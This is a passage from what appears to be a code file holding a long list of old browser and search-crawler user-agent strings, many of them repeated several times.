'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
